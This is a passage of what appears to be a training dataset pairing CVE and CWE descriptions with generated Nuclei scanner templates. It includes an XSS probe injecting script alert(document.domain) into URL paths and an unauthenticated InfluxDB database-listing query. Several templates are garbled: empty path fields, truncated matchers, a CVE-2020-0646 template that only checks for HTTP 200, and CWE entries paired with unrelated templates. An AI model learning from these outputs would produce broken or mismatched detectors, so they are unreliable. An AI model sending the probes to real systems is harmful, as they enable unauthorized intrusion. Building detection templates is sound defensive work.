\"security:\" \n - \"firewalls:\" \n - \"access_control:\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Honeywell Scada Configuration File - Detect", "input": "Title: Honeywell Scada Configuration File - Detect\nSummary: Honeywell Scada Configuration File - Detect. Honeywell Scada configuration file was detected. The downloaded file opens with the file name and contains critical information about the destination address.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: honeywell-scada-config\n\ninfo:\n name: Honeywell Scada Configuration File - Detect\n author: alperenkesk\n severity: low\n description: Honeywell Scada configuration file was detected. The downloaded file opens with the file name and contains critical information about the destination address.\n tags: scada,config,exposure,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web_caps/webCapsConfig\" \n matchers:\n - type: word\n words:\n - \"DeviceSubClass\" \n - \"IPAddress\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "honeywell-scada-config"} +{"instruction": "Generate a Nuclei template for CVE-2023-49230", "input": "Title: Missing Authorization in peplink balance_two_firmware\nSummary: An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in captive portals allows attackers to modify the portals' configurations without prior authentication.\nVulnerability Type: Missing Authorization\nSeverity: high\nAffected Products: peplink balance_two_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-49230\n\ninfo:\n name: Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload\n author: srilakivarma\n severity: high\n description: A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.\n tags: cve,cve2023,peplink,intrusive,file-upload,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/MANGA/index.cgi\" \n matchers:\n - type: word\n words:\n - \"Peplink\" \n part: body\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"status\": \"save_success\"\" \n part: body\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-49230"} +{"instruction": "Generate a Nuclei template for CVE-2020-0646", "input": "Title: Vulnerability (CWE-91) in microsoft .net_framework\nSummary: A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka '.NET Framework Remote Code Execution Injection Vulnerability'.\nVulnerability Type: Vulnerability (CWE-91)\nSeverity: critical\nAffected Products: microsoft .net_framework\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-0646\n\ninfo:\n name: Microsoft .NET Framework - Remote Code Execution\n author: pszyszkowski\n severity: critical\n description: A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka '.NET Framework Remote Code Execution Injection Vulnerability'.\n tags: cve,cve2020,net-framework,sharepoint,microsoft,packetstorm,rce,kev,oast,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2020-0646"} +{"instruction": "Generate a Nuclei template to detect Improper Neutralization of Script-Related HTML Tags in a Web Page", "input": "Title: Improper Neutralization of Script-Related HTML Tags in a Web Page (CWE-80)\nSummary: The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"<\", \">\", and \"&\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.\nVulnerability Type: Improper Neutralization of Script-Related HTML Tags in a Web Page\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: steve-xss\n\ninfo:\n name: SteVe - Cross-Site Scripting\n author: clem9669\n severity: medium\n description: SteVe contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: steve,xss,oss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/steve/services/\"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/\" \n - \"{{BaseURL}}/services/\"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/\" \n matchers:\n - type: word\n words:\n - \"/services/?stylesheet=1\">\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-80"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - IBM API", "input": "Title: Content-Security-Policy Bypass - IBM API\nSummary: Content-Security-Policy Bypass - IBM API. Tags: xss, csp-bypass, ibm-api\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: ibm-api-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - IBM API\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - IBM API\n tags: xss,csp-bypass,ibm-api,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"ibm.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "ibm-api-csp-bypass"} +{"instruction": "Generate a Nuclei template for CVE-2021-45428", "input": "Title: Vulnerability (CWE-639) in telesquare tlr-2005ksh_firmware\nSummary: TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.\nVulnerability Type: Vulnerability (CWE-639)\nSeverity: critical\nAffected Products: telesquare tlr-2005ksh_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-45428\n\ninfo:\n name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload\n author: gy741\n severity: critical\n description: TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.\n tags: cve2021,cve,telesquare,intrusive,fileupload,packetstorm,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2021-45428"} +{"instruction": "Generate a Nuclei template for CVE-2019-20933", "input": "Title: Authentication Bypass in influxdata influxdb and others\nSummary: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: influxdata influxdb, debian debian_linux\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-20933\n\ninfo:\n name: InfluxDB <1.7.6 - Authentication Bypass\n author: pussycat0x,c-sh0\n severity: critical\n description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/query?db=db&q=SHOW%20DATABASES\" \n matchers:\n - type: word\n words:\n - \"\"results\":\" \n - \"\"name\":\"databases\"\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2019-20933"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: periscope\n\ninfo:\n name: Periscope User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Periscope user name information check was conducted.\n tags: osint,osint-video,periscope,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.periscope.tv/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"